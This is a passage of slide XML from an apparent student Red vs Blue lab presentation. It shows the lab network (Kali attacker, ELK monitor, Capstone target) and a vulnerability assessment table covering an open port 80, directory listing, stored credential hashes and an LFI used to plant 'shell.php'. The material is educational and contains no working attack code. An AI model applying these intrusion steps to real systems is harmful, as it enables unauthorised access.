                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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US" sz="1400" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Red vs Blue (ml-lab-59159)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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solidFill>
                            <a:schemeClr val="accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hyper-V Host Manager (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>NATSwitch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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US" sz="1400" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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solidFill>
                            <a:schemeClr val="accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.90</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacking Machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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solidFill>
                            <a:schemeClr val="accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.100</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Network Monitoring Machine, Logs from the Capstone Machine were send to this Server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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solidFill>
                            <a:schemeClr val="accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent1">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Target Machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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 name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9156D3B5-4328-42E7-A32F-11EBD503EAA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:t>
            </a:fld>
            <a:endParaRPr sz="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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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000" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2369902453"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8359761" cy="3253620"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{B9850CC8-44EC-4B3D-A968-7F47EAFDB489}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2786587">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2786587">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2786587">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="349193">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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85063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open Port 80 </a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" i="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0070C0"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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50" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Port 80 is heavily used for web communication and if left open and unsecured it can allow an attacker to access and read sensitive information.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1150" i="1" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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chemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This vulnerability allows access to the content of the web servers, files , folders and sensitive (secret) material is exposed to the attacker.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" i="1" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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1018759">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Listing Enabled </a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0070C0"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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150" i="0" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1150" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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chemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Ashton had Ryan`s name and hash stored, the discovery of the credentials enabled further penetration of the system without extensive social engineering efforts.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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479680">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>LFI (Local File Inclusion)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" i="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0070C0"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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50" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>LFI (Local File Inclusion) is a vulnerability in poorly designed web applications, it allows users (attacker) to upload content into the application or server(s).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1150" i="1" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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chemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Successful exploitation of this vulnerability allowed the planting of the “shell.php” on the web server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" i="1" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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 name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05CEFC1-B6AA-4B49-BA88-55C3D0D0BEDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:t>
            </a:fld>
            <a:endParaRPr sz="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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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000" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398936364"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8362500" cy="3253620"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{B9850CC8-44EC-4B3D-A968-7F47EAFDB489}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="392102">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
